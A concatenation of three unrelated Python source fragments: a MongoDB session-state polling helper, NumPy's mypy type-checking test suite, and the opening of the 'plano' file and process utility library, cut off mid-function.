    Marks the document consumed (receive=True) before returning it.
    Returns (True, state_doc) on success, or (False, timeout_descriptor)
    after timeout/sleep_time polls without news.
    """
    max_retry = int(timeout/sleep_time)
    retry = 0
    ret = {}
    while(retry < max_retry):
        time.sleep(sleep_time)
        retry += 1
        #ret = c.find_one({'sid':sid, 'state': {'$in': states}})
        ret = db['state'].find_one({'sid':sid, 'receive': False})
        if ret:
            # Mark consumed so the next poll does not see the same event.
            update_data = {'receive': True}
            db['state'].update_one({'sid':sid}, {'$set':update_data}, upsert=True)
            return True, ret
    # Timed out: synthesize a timeout response telling the client to reset.
    ret = {
        'sid': sid,
        'info': {
            'next_action': 'Reset',
            'status': STATUS_CODE['timeout']['status'],
            'message': STATUS_CODE['timeout']['message']
        }
    }
    # api_log
    return False, ret
def check_sid_info_error(sid_info):
    """Validate a sid_info record.

    Returns {} when the record is usable, otherwise an error descriptor
    (status/message plus next_action='Reset').
    """
    timestamp = int(time.mktime(time.localtime()))
    if not sid_info:
        error = STATUS_CODE['invalid_sid']
    elif sid_info['expire_time'] < timestamp:
        error = STATUS_CODE['outdated_sid']
    elif sid_info['status'] != 1:
        error = STATUS_CODE['duplicate_sid']
    else:
        return {}
    # FIX: copy before annotating — the old code mutated the shared
    # STATUS_CODE table, permanently leaking 'next_action' into every
    # later lookup of the same status code.
    error = dict(error)
    error['next_action'] = 'Reset'
    return error
| |
import importlib.util
import itertools
import os
import re
import shutil
from collections import defaultdict
from typing import Optional, IO, Dict, List
import pytest
import numpy as np
from numpy.typing.mypy_plugin import _PRECISION_DICT, _EXTENDED_PRECISION_LIST
# Detect whether mypy is importable; every test below is skipped when not.
try:
    from mypy import api
except ImportError:
    NO_MYPY = True
else:
    NO_MYPY = False

# Directory layout of the type-checking test data.
DATA_DIR = os.path.join(os.path.dirname(__file__), "data")
PASS_DIR = os.path.join(DATA_DIR, "pass")      # must type-check cleanly
FAIL_DIR = os.path.join(DATA_DIR, "fail")      # must produce the annotated errors
REVEAL_DIR = os.path.join(DATA_DIR, "reveal")  # reveal_type expectations
MISC_DIR = os.path.join(DATA_DIR, "misc")
MYPY_INI = os.path.join(DATA_DIR, "mypy.ini")
CACHE_DIR = os.path.join(DATA_DIR, ".mypy_cache")

#: A dictionary with file names as keys and lists of the mypy stdout as values.
#: To-be populated by `run_mypy`.
OUTPUT_MYPY: Dict[str, List[str]] = {}
def _key_func(key: str) -> str:
"""Split at the first occurance of the ``:`` character.
Windows drive-letters (*e.g.* ``C:``) are ignored herein.
"""
drive, tail = os.path.splitdrive(key)
return os.path.join(drive, tail.split(":", 1)[0])
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
@pytest.fixture(scope="module", autouse=True)
def run_mypy() -> None:
    """Clears the cache and run mypy before running any of the typing tests.

    The mypy results are cached in `OUTPUT_MYPY` for further use.
    NOTE(review): pytest marks applied to a *fixture* have no effect —
    confirm whether slow/skipif were meant for the tests instead.
    """
    if os.path.isdir(CACHE_DIR):
        shutil.rmtree(CACHE_DIR)
    for directory in (PASS_DIR, REVEAL_DIR, FAIL_DIR, MISC_DIR):
        # Run mypy
        stdout, stderr, _ = api.run([
            "--config-file",
            MYPY_INI,
            "--cache-dir",
            CACHE_DIR,
            directory,
        ])
        assert not stderr, directory
        stdout = stdout.replace('*', '')
        # Parse the output: group the lines by the file they refer to.
        iterator = itertools.groupby(stdout.split("\n"), key=_key_func)
        OUTPUT_MYPY.update((k, list(v)) for k, v in iterator if k)
def get_test_cases(directory):
    """Yield a pytest param per ``.py`` file under *directory*.

    The param id is the path relative to *directory* for readable test names.
    """
    for root, _, files in os.walk(directory):
        for fname in files:
            if os.path.splitext(fname)[1] != ".py":
                continue
            fullpath = os.path.join(root, fname)
            yield pytest.param(
                fullpath,
                id=os.path.relpath(fullpath, start=directory),
            )
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
@pytest.mark.parametrize("path", get_test_cases(PASS_DIR))
def test_success(path):
    """Files in pass/ must produce no mypy output at all."""
    # Alias `OUTPUT_MYPY` so that it appears in the local namespace
    output_mypy = OUTPUT_MYPY
    if path in output_mypy:
        # FIX: OUTPUT_MYPY maps each path to a *list* of lines; the old
        # code called `.values()` on that list, raising AttributeError
        # instead of reporting the mypy output.
        raise AssertionError("\n".join(output_mypy[path]))
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
@pytest.mark.parametrize("path", get_test_cases(FAIL_DIR))
def test_fail(path):
    """Each `# E:` comment in a fail/ file must match a mypy error on that line."""
    __tracebackhide__ = True
    with open(path) as fin:
        lines = fin.readlines()
    errors = defaultdict(lambda: "")
    output_mypy = OUTPUT_MYPY
    assert path in output_mypy
    # Bucket mypy's output by source line number.
    for error_line in output_mypy[path]:
        match = re.match(
            r"^.+\.py:(?P<lineno>\d+): (error|note): .+$",
            error_line,
        )
        if match is None:
            raise ValueError(f"Unexpected error line format: {error_line}")
        lineno = int(match.group('lineno'))
        errors[lineno] += error_line
    # Compare every annotated (or erroring) source line against the buckets.
    for i, line in enumerate(lines):
        lineno = i + 1
        if line.startswith('#') or (" E:" not in line and lineno not in errors):
            continue
        target_line = lines[lineno - 1]
        if "# E:" in target_line:
            marker = target_line.split("# E:")[-1].strip()
            expected_error = errors.get(lineno)
            _test_fail(path, marker, expected_error, lineno)
        else:
            # mypy reported an error on a line without an `# E:` marker.
            pytest.fail(f"Error {repr(errors[lineno])} not found")
_FAIL_MSG1 = """Extra error at line {}
Extra error: {!r}
"""
_FAIL_MSG2 = """Error mismatch at line {}
Expected error: {!r}
Observed error: {!r}
"""
def _test_fail(path: str, error: str, expected_error: Optional[str], lineno: int) -> None:
if expected_error is None:
raise AssertionError(_FAIL_MSG1.format(lineno, error))
elif error not in expected_error:
raise AssertionError(_FAIL_MSG2.format(lineno, expected_error, error))
def _construct_format_dict():
    """Build the format-key -> revealed-type-string table.

    Fixed-width aliases are spelled out literally; platform-dependent
    aliases (byte/short/intc/...) are resolved through the mypy plugin's
    `_PRECISION_DICT`, remapped into the ``numpy.typing`` namespace.
    """
    # Map e.g. '_NBitIntP' to its concrete numpy.typing._NNBit alias.
    dct = {k.split(".")[-1]: v.replace("numpy", "numpy.typing") for
           k, v in _PRECISION_DICT.items()}
    return {
        "uint8": "numpy.unsignedinteger[numpy.typing._8Bit]",
        "uint16": "numpy.unsignedinteger[numpy.typing._16Bit]",
        "uint32": "numpy.unsignedinteger[numpy.typing._32Bit]",
        "uint64": "numpy.unsignedinteger[numpy.typing._64Bit]",
        "uint128": "numpy.unsignedinteger[numpy.typing._128Bit]",
        "uint256": "numpy.unsignedinteger[numpy.typing._256Bit]",
        "int8": "numpy.signedinteger[numpy.typing._8Bit]",
        "int16": "numpy.signedinteger[numpy.typing._16Bit]",
        "int32": "numpy.signedinteger[numpy.typing._32Bit]",
        "int64": "numpy.signedinteger[numpy.typing._64Bit]",
        "int128": "numpy.signedinteger[numpy.typing._128Bit]",
        "int256": "numpy.signedinteger[numpy.typing._256Bit]",
        "float16": "numpy.floating[numpy.typing._16Bit]",
        "float32": "numpy.floating[numpy.typing._32Bit]",
        "float64": "numpy.floating[numpy.typing._64Bit]",
        "float80": "numpy.floating[numpy.typing._80Bit]",
        "float96": "numpy.floating[numpy.typing._96Bit]",
        "float128": "numpy.floating[numpy.typing._128Bit]",
        "float256": "numpy.floating[numpy.typing._256Bit]",
        "complex64": "numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]",
        "complex128": "numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]",
        "complex160": "numpy.complexfloating[numpy.typing._80Bit, numpy.typing._80Bit]",
        "complex192": "numpy.complexfloating[numpy.typing._96Bit, numpy.typing._96Bit]",
        "complex256": "numpy.complexfloating[numpy.typing._128Bit, numpy.typing._128Bit]",
        "complex512": "numpy.complexfloating[numpy.typing._256Bit, numpy.typing._256Bit]",
        "ubyte": f"numpy.unsignedinteger[{dct['_NBitByte']}]",
        "ushort": f"numpy.unsignedinteger[{dct['_NBitShort']}]",
        "uintc": f"numpy.unsignedinteger[{dct['_NBitIntC']}]",
        "uintp": f"numpy.unsignedinteger[{dct['_NBitIntP']}]",
        "uint": f"numpy.unsignedinteger[{dct['_NBitInt']}]",
        "ulonglong": f"numpy.unsignedinteger[{dct['_NBitLongLong']}]",
        "byte": f"numpy.signedinteger[{dct['_NBitByte']}]",
        "short": f"numpy.signedinteger[{dct['_NBitShort']}]",
        "intc": f"numpy.signedinteger[{dct['_NBitIntC']}]",
        "intp": f"numpy.signedinteger[{dct['_NBitIntP']}]",
        "int_": f"numpy.signedinteger[{dct['_NBitInt']}]",
        "longlong": f"numpy.signedinteger[{dct['_NBitLongLong']}]",
        "half": f"numpy.floating[{dct['_NBitHalf']}]",
        "single": f"numpy.floating[{dct['_NBitSingle']}]",
        "double": f"numpy.floating[{dct['_NBitDouble']}]",
        "longdouble": f"numpy.floating[{dct['_NBitLongDouble']}]",
        "csingle": f"numpy.complexfloating[{dct['_NBitSingle']}, {dct['_NBitSingle']}]",
        "cdouble": f"numpy.complexfloating[{dct['_NBitDouble']}, {dct['_NBitDouble']}]",
        "clongdouble": f"numpy.complexfloating[{dct['_NBitLongDouble']}, {dct['_NBitLongDouble']}]",
        # numpy.typing
        "_NBitInt": dct['_NBitInt'],
    }

#: A dictionary with all supported format keys (as keys)
#: and matching values
FORMAT_DICT: Dict[str, str] = _construct_format_dict()
def _parse_reveals(file: IO[str]) -> List[str]:
    """Extract and parse all ``" # E: "`` comments from the passed file-like object.

    All format keys will be substituted for their respective value from
    `FORMAT_DICT`, *e.g.* ``"{float64}"`` becomes
    ``"numpy.floating[numpy.typing._64Bit]"``.
    """
    text = file.read().replace("*", "")
    # One entry per input line ("" when the line carries no comment).
    per_line = np.char.partition(text.split("\n"), sep=" # E: ")[:, 2]
    # "/n" is a deliberate join marker that cannot occur in the source.
    joined = "/n".join(per_line)
    # Only search for the `{*}` pattern within comments, otherwise there
    # is the risk of accidently grabbing dictionaries and sets.
    keys = set(re.findall(r"\{(.*?)\}", joined))
    substitutions = {
        k: FORMAT_DICT.get(k, f"<UNRECOGNIZED FORMAT KEY {k!r}>") for k in keys
    }
    return joined.format(**substitutions).split("/n")
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
@pytest.mark.parametrize("path", get_test_cases(REVEAL_DIR))
def test_reveal(path):
    """Each mypy reveal note must match the `# E:` comment on its line."""
    __tracebackhide__ = True
    with open(path) as fin:
        lines = _parse_reveals(fin)
    output_mypy = OUTPUT_MYPY
    assert path in output_mypy
    for error_line in output_mypy[path]:
        match = re.match(
            r"^.+\.py:(?P<lineno>\d+): note: .+$",
            error_line,
        )
        if match is None:
            raise ValueError(f"Unexpected reveal line format: {error_line}")
        # `lines` is 0-indexed; mypy line numbers are 1-indexed.
        lineno = int(match.group('lineno')) - 1
        assert "Revealed type is" in error_line
        marker = lines[lineno]
        _test_reveal(path, marker, error_line, 1 + lineno)
_REVEAL_MSG = """Reveal mismatch at line {}
Expected reveal: {!r}
Observed reveal: {!r}
"""
def _test_reveal(path: str, reveal: str, expected_reveal: str, lineno: int) -> None:
if reveal not in expected_reveal:
raise AssertionError(_REVEAL_MSG.format(lineno, expected_reveal, reveal))
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
@pytest.mark.parametrize("path", get_test_cases(PASS_DIR))
def test_code_runs(path):
    """Validate that the files in pass/ not only type-check but also run."""
    dirname, filename = path.split(os.sep)[-2:]
    # FIX: the module name previously embedded the literal "(unknown)"
    # instead of the file's own name, registering every pass/ file under
    # the same bogus module name; also dropped the unused
    # `path_without_extension` local.
    spec = importlib.util.spec_from_file_location(f"{dirname}.{filename}", path)
    test_module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(test_module)
# Line numbers in misc/extended_precision.py mapped to the extended-precision
# alias each line exercises (used by test_extended_precision below).
LINENO_MAPPING = {
    3: "uint128",
    4: "uint256",
    6: "int128",
    7: "int256",
    9: "float80",
    10: "float96",
    11: "float128",
    12: "float256",
    14: "complex160",
    15: "complex192",
    16: "complex256",
    17: "complex512",
}
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
def test_extended_precision() -> None:
    """Check mypy's verdict on the extended-precision scalar aliases.

    Aliases present in `_EXTENDED_PRECISION_LIST` must reveal the expected
    type; aliases absent on this platform must produce a
    "Module has no attribute" error.
    """
    path = os.path.join(MISC_DIR, "extended_precision.py")
    output_mypy = OUTPUT_MYPY
    assert path in output_mypy
    for _msg in output_mypy[path]:
        *_, _lineno, msg_typ, msg = _msg.split(":")
        lineno = int(_lineno)
        msg_typ = msg_typ.strip()
        assert msg_typ in {"error", "note"}
        if LINENO_MAPPING[lineno] in _EXTENDED_PRECISION_LIST:
            # Supported alias: expect a reveal note, never an error.
            if msg_typ == "error":
                raise ValueError(f"Unexpected reveal line format: {lineno}")
            else:
                marker = FORMAT_DICT[LINENO_MAPPING[lineno]]
                _test_reveal(path, marker, msg, lineno)
        else:
            # Unsupported on this platform: expect an attribute error.
            if msg_typ == "error":
                marker = "Module has no attribute"
                _test_fail(path, marker, msg, lineno)
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import print_function
import atexit as _atexit
import binascii as _binascii
import codecs as _codecs
import collections as _collections
import fnmatch as _fnmatch
import getpass as _getpass
import os as _os
import random as _random
import re as _re
import shlex as _shlex
import shutil as _shutil
import signal as _signal
import subprocess as _subprocess
import sys as _sys
import tarfile as _tarfile
import tempfile as _tempfile
import time as _time
import traceback as _traceback
import types as _types
import uuid as _uuid
from subprocess import CalledProcessError
# See documentation at http://www.ssorj.net/projects/plano.html
# Ordered message levels; the tuple index is the numeric severity.
_message_levels = (
    "debug",
    "notice",
    "warn",
    "error",
)

# Numeric severity of each level.
_debug = _message_levels.index("debug")
_notice = _message_levels.index("notice")
_warn = _message_levels.index("warn")
_error = _message_levels.index("error")

# Destination stream for messages and the minimum level that gets printed.
_message_output = _sys.stderr
_message_threshold = _notice
def set_message_output(writeable):
    """Redirect plano messages to *writeable* (None silences them)."""
    global _message_output
    _message_output = writeable

def set_message_threshold(level):
    """Set the minimum level ('debug'|'notice'|'warn'|'error') that is printed."""
    assert level in _message_levels
    global _message_threshold
    _message_threshold = _message_levels.index(level)
def fail(message, *args):
    """Log an error and raise; re-raises *message* when it is an exception."""
    error(message, *args)
    if isinstance(message, BaseException):
        raise message
    raise Exception(message)

def error(message, *args):
    """Log at error level (always printed, regardless of threshold)."""
    _print_message("Error", message, args)

def warn(message, *args):
    """Log at warn level, honoring the message threshold."""
    if _message_threshold <= _warn:
        _print_message("Warn", message, args)

def notice(message, *args):
    """Log at notice level (printed without a category prefix)."""
    if _message_threshold <= _notice:
        _print_message(None, message, args)

def debug(message, *args):
    """Log at debug level."""
    if _message_threshold <= _debug:
        _print_message("Debug", message, args)
def exit(arg=None, *args):
    """Exit the process.

    - exit() or exit(0): exit successfully
    - exit(message, *args): log the formatted message, exit with code 1
    - exit(code): log the code and exit with it
    """
    if arg in (0, None):
        _sys.exit()
    if _is_string(arg):
        # FIX: the formatting args were passed as one tuple (`error(arg,
        # args)`), so "{0}" placeholders rendered the tuple itself.
        error(arg, *args)
        _sys.exit(1)
    elif isinstance(arg, int):
        # FIX: `_types.IntType` does not exist on Python 3; plain `int`
        # works on both interpreters this file targets.
        error("Exiting with code {0}", arg)
        _sys.exit(arg)
    else:
        raise Exception()
def _print_message(category, message, args):
    # Messages are dropped entirely when output was disabled via
    # set_message_output(None).
    if _message_output is None:
        return
    message = _format_message(category, message, args)
    print(message, file=_message_output)
    _message_output.flush()

def _format_message(category, message, args):
    """Build '<program>: [<Category>: ]<Message>' with format args applied."""
    if not _is_string(message):
        message = str(message)
    if args:
        message = message.format(*args)
    # Capitalize the first letter for consistent output.
    if len(message) > 0 and message[0].islower():
        message = message[0].upper() + message[1:]
    if category:
        message = "{0}: {1}".format(category, message)
    program = program_name()
    message = "{0}: {1}".format(program, message)
    return message
def flush():
    """Flush both standard output streams."""
    for stream in (_sys.stdout, _sys.stderr):
        stream.flush()
# Convenience aliases: common os/os.path/time operations under plano names.
absolute_path = _os.path.abspath
normalize_path = _os.path.normpath
exists = _os.path.exists
is_absolute = _os.path.isabs
is_dir = _os.path.isdir
is_file = _os.path.isfile
is_link = _os.path.islink
join = _os.path.join
split = _os.path.split
split_extension = _os.path.splitext
current_dir = _os.getcwd
sleep = _time.sleep

# Platform constants and process-wide state.
LINE_SEP = _os.linesep
PATH_SEP = _os.sep
PATH_VAR_SEP = _os.pathsep
ENV = _os.environ
ARGS = _sys.argv
def home_dir(user=""):
    """Return the home directory of *user* (the current user by default)."""
    return _os.path.expanduser("~{0}".format(user))

def parent_dir(path):
    """Return the parent directory of *path*."""
    path = normalize_path(path)
    parent, child = split(path)
    return parent

def file_name(file):
    """Return the base name of *file*."""
    file = normalize_path(file)
    dir, name = split(file)
    return name

def name_stem(file):
    """Return the file name without its extension ('.tar.gz' counts as one)."""
    name = file_name(file)
    if name.endswith(".tar.gz"):
        name = name[:-3]
    stem, ext = split_extension(name)
    return stem

def name_extension(file):
    """Return the extension of *file*, including the leading dot."""
    name = file_name(file)
    stem, ext = split_extension(name)
    return ext

def program_name(command=None):
    """Return the program name from *command* (or sys.argv).

    Leading VAR=value assignments are skipped; returns None when every
    token contains '='.
    """
    if command is None:
        args = ARGS
    else:
        args = command.split()
    for arg in args:
        if "=" not in arg:
            return file_name(arg)
def read(file):
    """Return the entire contents of *file*, decoded as UTF-8."""
    with _codecs.open(file, encoding="utf-8", mode="r") as f:
        return f.read()

def write(file, string):
    """Replace the contents of *file* with *string*; returns *file*."""
    with _codecs.open(file, encoding="utf-8", mode="w") as f:
        f.write(string)
    return file

def append(file, string):
    """Append *string* to *file* (created when missing); returns *file*."""
    with _codecs.open(file, encoding="utf-8", mode="a") as f:
        f.write(string)
    return file

def prepend(file, string):
    """Insert *string* at the start of *file*; returns *file*."""
    return write(file, string + read(file))

# XXX Should this work on directories?
def touch(file):
    """Ensure *file* exists without altering its contents; returns *file*."""
    return append(file, "")
def tail(file, n):
    """Return the last *n* lines of *file* joined into one string."""
    return "".join(tail_lines(file, n))

def read_lines(file):
    """Return the lines of *file* (UTF-8), keeping line endings."""
    with _codecs.open(file, encoding="utf-8", mode="r") as f:
        return f.readlines()
def write_lines(file, lines):
    """Replace the contents of *file* with *lines*; returns *file*.

    FIX: the file was previously opened in read mode ("r"), so the
    writelines call failed; it is now opened for writing.
    """
    with _codecs.open(file, encoding="utf-8", mode="w") as f:
        f.writelines(lines)
    return file
def append_lines(file, lines):
    """Append *lines* to *file* (created when missing); returns *file*.

    FIX: previously wrote the undefined name ``string`` instead of the
    ``lines`` parameter, raising NameError on every call.
    """
    with _codecs.open(file, encoding="utf-8", mode="a") as f:
        f.writelines(lines)
    return file
def prepend_lines(file, lines):
    """Insert *lines* before the existing content of *file*; returns *file*."""
    existing = read_lines(file)
    with _codecs.open(file, encoding="utf-8", mode="w") as f:
        f.writelines(lines)
        f.writelines(existing)
    return file
# Derived from http://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail
def tail_lines(file, n):
    """Return the last *n* lines of *file*.

    Seeks backwards from the end in geometrically growing steps until at
    least n+1 lines are in view, then keeps the final n of them.
    """
    assert n >= 0
    with _codecs.open(file, encoding="utf-8", mode="r") as f:
        pos = n + 1
        lines = list()
        while len(lines) <= n:
            try:
                # Step back `pos` units from the end (whence=2).
                f.seek(-pos, 2)
            except IOError:
                # File shorter than `pos`: read everything and stop.
                f.seek(0)
                break
            finally:
                # Runs on both paths, re-reading from the current offset.
                lines = f.readlines()
            pos *= 2
    return lines[-n:]
# Process-wide scratch directory, removed automatically at interpreter exit.
_temp_dir = _tempfile.mkdtemp(prefix="plano-")

def _remove_temp_dir():
    # Best-effort cleanup; ignore_errors avoids noise during shutdown.
    _shutil.rmtree(_temp_dir, ignore_errors=True)

_atexit.register(_remove_temp_dir)
# XXX Use _tempfile instead
def make_temp_file():
    """Create an empty uniquely-named file in the plano temp dir; returns its path."""
    key = unique_id(4)
    file = join(_temp_dir, "_file_{0}".format(key))
    return append(file, "")

# This one is deleted on process exit
def make_temp_dir():
    """Create a fresh directory under the plano temp dir (removed at exit)."""
    return _tempfile.mkdtemp(prefix="_dir_", dir=_temp_dir)

# This one sticks around
def make_user_temp_dir():
    """Return a per-user directory under the system temp dir (not auto-removed)."""
    temp_dir = _tempfile.gettempdir()
    user = _getpass.getuser()
    user_temp_dir = join(temp_dir, user)
    return make_dir(user_temp_dir)
def unique_id(length=16):
    """Return a random lowercase-hex id of 2*length characters (1 <= length <= 16)."""
    assert 1 <= length <= 16
    raw = _uuid.uuid4().bytes[:length]
    return _binascii.hexlify(raw).decode("utf-8")
def copy(from_path, to_path):
    """Copy a file or directory tree to *to_path*, creating parents; returns *to_path*."""
    notice("Copying '{0}' to '{1}'", from_path, to_path)
    to_dir = parent_dir(to_path)
    if to_dir:
        make_dir(to_dir)
    if is_dir(from_path):
        # Directory trees use the local _copytree, which tolerates an
        # already-existing destination.
        _copytree(from_path, to_path, symlinks=True)
    else:
        _shutil.copy(from_path, to_path)
    return to_path

def move(from_path, to_path):
    """Move a file or directory; returns *to_path*."""
    notice("Moving '{0}' to '{1}'", from_path, to_path)
    _shutil.move(from_path, to_path)
    return to_path

def rename(path, expr, replacement):
    """Rename *path* by regex-replacing *expr* in its base name; returns the new path."""
    path = normalize_path(path)
    # NOTE(review): this local name shadows the parent_dir() helper above.
    parent_dir, name = split(path)
    to_name = string_replace(name, expr, replacement)
    to_path = join(parent_dir, to_name)
    notice("Renaming '{0}' to '{1}'", path, to_path)
    move(path, to_path)
    return to_path
def remove(path):
    """Delete a file or directory tree if it exists; returns *path* (None when absent)."""
    notice("Removing '{0}'", path)
    if not exists(path):
        return
    if is_dir(path):
        _shutil.rmtree(path, ignore_errors=True)
    else:
        _os.remove(path)
    return path

def make_link(source_path, link_file):
    """Create symlink *link_file* -> *source_path*; returns *link_file*.

    Asserts (and returns None) when the link already exists and points at
    the expected target.
    """
    if exists(link_file):
        assert read_link(link_file) == source_path
        return
    _os.symlink(source_path, link_file)
    return link_file

def read_link(file):
    """Return the target path of symlink *file*."""
    return _os.readlink(file)
def find(dir, *patterns):
    """Return sorted paths under *dir* whose basenames match any fnmatch pattern.

    With no patterns, every file and directory is returned.
    """
    if not patterns:
        patterns = ("*",)
    matches = set()
    for root, dirs, files in _os.walk(dir):
        for pattern in patterns:
            for name in _fnmatch.filter(dirs, pattern):
                matches.add(_os.path.join(root, name))
            for name in _fnmatch.filter(files, pattern):
                matches.add(_os.path.join(root, name))
    return sorted(matches)

def find_any_one(dir, *patterns):
    """Return one matching path, or None when nothing matches."""
    paths = find(dir, *patterns)
    if paths:
        return paths[0]

def find_only_one(dir, *patterns):
    """Return the single matching path; None when absent, assert when several."""
    paths = find(dir, *patterns)
    if not paths:
        return
    assert len(paths) == 1
    return paths[0]
# find_via_expr?
def string_replace(string, expr, replacement, count=0):
    """Regex-substitute *expr* with *replacement* in *string*; count=0 replaces all."""
    return _re.compile(expr).sub(replacement, string, count)
def make_dir(dir):
    """Create *dir* (and any missing parents) when absent; returns *dir*."""
    if not _os.path.exists(dir):
        _os.makedirs(dir)
    return dir
# Returns the current working directory so you can change it back
def change_dir(dir):
    """Change the working directory to *dir*; returns the previous cwd."""
    notice("Changing directory to '{0}'", dir)
    cwd = current_dir()
    _os.chdir(dir)
    return cwd
def list_dir(dir, *patterns):
    """List basenames in *dir*, optionally filtered by fnmatch patterns; sorted."""
    assert _os.path.isdir(dir)
    names = _os.listdir(dir)
    if not patterns:
        return sorted(names)
    matched = set()
    for pattern in patterns:
        matched.update(_fnmatch.filter(names, pattern))
    return sorted(matched)
class working_dir(object):
    """Context manager that runs its body inside *dir*, restoring the old cwd."""

    def __init__(self, dir):
        self.dir = dir
        self.prev_dir = None

    def __enter__(self):
        # change_dir returns the previous cwd so we can restore it on exit.
        self.prev_dir = change_dir(self.dir)
        return self.dir

    def __exit__(self, type, value, traceback):
        change_dir(self.prev_dir)
def call(command, *args, **kwargs):
    """Run *command* to completion; raise CalledProcessError on non-zero exit."""
    proc = start_process(command, *args, **kwargs)
    wait_for_process(proc)
    if proc.returncode != 0:
        command_string = _command_string(command)
        command_string = command_string.format(*args)
        raise CalledProcessError(proc.returncode, command_string)

def call_for_exit_code(command, *args, **kwargs):
    """Run *command* to completion and return its exit code."""
    proc = start_process(command, *args, **kwargs)
    wait_for_process(proc)
    return proc.returncode

def call_for_output(command, *args, **kwargs):
    """Run *command* and return its captured stdout; raise on non-zero exit."""
    kwargs["stdout"] = _subprocess.PIPE
    proc = start_process(command, *args, **kwargs)
    output = proc.communicate()[0]
    exit_code = proc.poll()
    if exit_code not in (None, 0):
        command_string = _command_string(command)
        command_string = command_string.format(*args)
        error = CalledProcessError(exit_code, command_string)
        error.output = output
        raise error
    return output
def start_process(command, *args, **kwargs):
    """Start *command* (format string or argv iterable) and return the process.

    A string command is formatted with *args* and shlex-split unless
    shell=True is passed, in which case the string goes to the shell
    verbatim. An iterable command is used as argv directly.
    """
    if _is_string(command):
        command = command.format(*args)
        command_args = _shlex.split(command)
        command_string = command
    elif isinstance(command, _collections.Iterable):
        # NOTE(review): collections.Iterable was removed in Python 3.10
        # (moved to collections.abc) — confirm the target interpreter.
        assert len(args) == 0, args
        command_args = command
        command_string = _command_string(command)
    else:
        raise Exception()
    notice("Calling '{0}'", command_string)
    if "shell" in kwargs and kwargs["shell"]:
        proc = _Process(command_string, **kwargs)
    else:
        proc = _Process(command_args, **kwargs)
    debug("{0} started", proc)
    return proc

def _command_string(command):
    """Render a command (string or argv list) as one shell-style string."""
    if _is_string(command):
        return command
    # Quote argv entries that contain spaces.
    elems = ["\"{0}\"".format(x) if " " in x else x for x in command]
    return " ".join(elems)
class _Process(_subprocess.Popen):
    """Popen subclass that remembers a human-readable process name."""

    def __init__(self, command, *args, **kwargs):
        # NOTE(review): a "name" kwarg would be forwarded to Popen (which
        # rejects it) before the lookup below ever runs — confirm intent.
        super(_Process, self).__init__(command, *args, **kwargs)
        try:
            self.name = kwargs["name"]
        except KeyError:
            # Derive a name from the command itself.
            if _is_string(command):
                self.name = program_name(command)
            elif isinstance(command, _collections.Iterable):
                self.name = command[0]
            else:
                raise Exception()

    def __repr__(self):
        return "process {0} ({1})".format(self.pid, self.name)
def stop_process(proc):
    """Terminate *proc* if still running.

    Returns the exit code via wait_for_process, or None when the process
    had already exited (the outcome is only logged in that case).
    """
    notice("Stopping {0}", proc)
    if proc.poll() is not None:
        if proc.returncode == 0:
            debug("{0} already exited normally", proc)
        elif proc.returncode == -(_signal.SIGTERM):
            notice("{0} was already terminated", proc)
        else:
            m = "{0} already exited with code {1}"
            error(m, proc, proc.returncode)
        return
    proc.terminate()
    return wait_for_process(proc)

def wait_for_process(proc):
    """Block until *proc* exits; log the outcome and return its exit code."""
    debug("Waiting for {0} to exit", proc)
    proc.wait()
    if proc.returncode == 0:
        debug("{0} exited normally", proc)
    elif proc.returncode == -(_signal.SIGTERM):
        # Negative return codes mean death-by-signal on POSIX.
        notice("{0} exited after termination", proc)
    else:
        error("{0} exited with code {1}", proc, proc.returncode)
    return proc.returncode
def make_archive(input_dir, output_dir, archive_stem):
    """Create <output_dir>/<archive_stem>.tar.gz from *input_dir*.

    The input is staged under a temp dir named *archive_stem* so the
    archive's top-level entry carries that name. Returns the archive path.
    """
    temp_dir = make_temp_dir()
    temp_input_dir = join(temp_dir, archive_stem)
    copy(input_dir, temp_input_dir)
    make_dir(output_dir)
    output_file = "{0}.tar.gz".format(join(output_dir, archive_stem))
    output_file = absolute_path(output_file)
    with working_dir(temp_dir):
        call("tar -czf {0} {1}", output_file, archive_stem)
    return output_file

def extract_archive(archive_file, output_dir):
    """Extract *archive_file* into *output_dir* (created if missing); returns it."""
    assert is_file(archive_file)
    if not exists(output_dir):
        make_dir(output_dir)
    archive_file = absolute_path(archive_file)
    with working_dir(output_dir):
        call("tar -xf {0}", archive_file)
    return output_dir

def rename_archive(archive_file, new_archive_stem):
    """Rebuild *archive_file* so its stem and top-level entry are *new_archive_stem*.

    No-op when the stem already matches. The original archive is removed;
    returns the new archive path.
    """
    assert is_file(archive_file)
    if name_stem(archive_file) == new_archive_stem:
        return archive_file
    temp_dir = make_temp_dir()
    extract_archive(archive_file, temp_dir)
    # Assumes the archive has exactly one top-level entry.
    input_name = list_dir(temp_dir)[0]
    input_dir = join(temp_dir, input_name)
    output_file = make_archive(input_dir, temp_dir, new_archive_stem)
    output_name = file_name(output_file)
    archive_dir = parent_dir(archive_file)
    new_archive_file = join(archive_dir, output_name)
    move(output_file, new_archive_file)
    remove(archive_file)
    return new_archive_file
def random_port(min=49152, max=65535):
    """Return a random port in [min, max] (defaults to the IANA ephemeral range)."""
    port = _random.randint(min, max)
    return port
# Modified copytree impl that allows for already existing destination
# dirs
def _copytree(src, dst, symlinks=False, ignore=None):
"""Recursively copy a directory tree using copy2().
If exception(s) occur, an Error is raised with a list of reasons.
